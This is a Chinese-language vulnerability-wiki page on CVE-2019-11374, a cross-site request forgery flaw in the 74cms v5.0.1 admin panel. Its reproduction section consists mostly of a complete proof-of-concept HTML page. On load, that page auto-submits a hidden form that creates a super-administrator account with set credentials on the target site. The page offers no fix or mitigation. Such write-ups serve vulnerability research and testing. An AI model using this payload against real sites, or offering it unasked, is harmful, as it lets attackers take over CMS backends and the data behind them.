menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right 74cms chevron_right (CVE-2019-11374)74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-11374)74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞.md
    1.53 KB / 2021-04-21 09:23:46
        (CVE-2019-11374)74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞
    =========================================================
    
    一、漏洞简介
    ------------
    
    在74CMS
    v5.0.1后台存在一个跨站请求伪造(CSRF)漏洞,该漏洞url:`/index.php?m=admin&c=admin&a=add`攻击者可以利用该漏洞诱骗管理员点击恶意页面,从而任意添加一个后台管理员账户,达到进入后台,获得一个后台管理员角色的控制权。
    
    二、漏洞影响
    ------------
    
    74CMS v5.0.1
    
    三、复现过程
    ------------
    
    首先我们登录后台页面,并添加管理员,然后添加信息,用burp\_suite抓包
    
    1.png
    
    当管理员登录后台后,点击攻击者发来的连接即可创建一个新的超级管理员账户
    
    2.png
    
        <!DOCTYPE html>
        <html>
          <head>
          <title> CSRF </title>
          <script type="text/javascript">
            function exec1(){
              document.getElementById('form1').submit();
            }
          </script>
          </head>
          <body onload="exec1();">
            <form id="form1" action="https://www.0-sec.org.com/index.php?m=Admin&c=admin&a=add" method="POST">
              <input type="hidden" name="username" value="admin688" />
          <input type="hidden" name="email" value="[email protected]" />
              <input type="hidden" name="password" value="admin688" />
              <input type="hidden" name="repassword" value="admin688" />  
          <input type="hidden" name="role_id" value="1" />
            </form>
          </body>
        </html>
    
    参考链接
    --------
    
    > https://www.023niu.com/show-62-32-1.html
    
    
    links
    file_download